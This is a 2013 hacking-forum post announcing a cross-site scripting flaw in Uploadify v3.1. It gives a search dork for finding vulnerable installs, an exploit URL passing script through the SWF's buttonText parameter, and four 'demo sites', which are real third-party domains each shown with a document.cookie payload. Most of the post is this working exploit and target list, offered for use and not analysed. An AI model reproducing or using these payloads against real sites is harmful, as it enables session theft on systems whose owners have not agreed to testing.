Home of WhiteHat CyberArmy
 
HomeFAQSearchMemberlistUsergroupsRegisterLog in

Share | 
 

 Uploadify v3.1 XSS Vulnerability

Go down 
AuthorMessage
W-P
Admin
avatar

Posts : 80
Join date : 2013-11-12
Age : 32
Location : Cyber World

PostSubject: Uploadify v3.1 XSS Vulnerability   Tue Nov 12, 2013 12:42 pm

===============================
Title : Uploadify v3.1 XSS Vulnerability
# Date: 2013-09-1
# Software Link: [You must be registered and logged in to see this link.]
# Founded by: ''Master Zombie''
# Tested on: Windows XP SP3
# Category: [webapps]
# Dork : inurl:admin/include/uploadify
===============================

Exploit path:
Code:
http://127.0.0.1/admin/include/uploadify/uploadify.swf?buttonText=<a href=[ XSS ]
Demo Sites :
Code:
http://www.renders-dbz.com/admin/include/uploadify/uploadify.swf?buttonText=<a href='javascript:alert(document.cookie)'>W-P</a>
Code:
http://photos.davidandginny.co.uk/admin/include/uploadify/uploadify.swf?buttonText=<a href='javascript:alert(document.cookie)'>W-P</a>
Code:
http://landevejsridder.dk/piwigo/admin/include/uploadify/uploadify.swf?buttonText=<a href='javascript:alert(document.cookie)'>W-P</a>
Code:
http://massecritique.agora.eu.org/piwigo/admin/include/uploadify/uploadify.swf?buttonText=<a href='javascript:alert(document.cookie)'>W-P</a>
Back to top Go down
View user profile http://whitehatcyberarmy.forumotion.com
 
Uploadify v3.1 XSS Vulnerability
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Home of Ethical WhiteHat CyberArmy :: WhiteHat CyberArmy Community :: Hacking & Security Tutorials-
Jump to: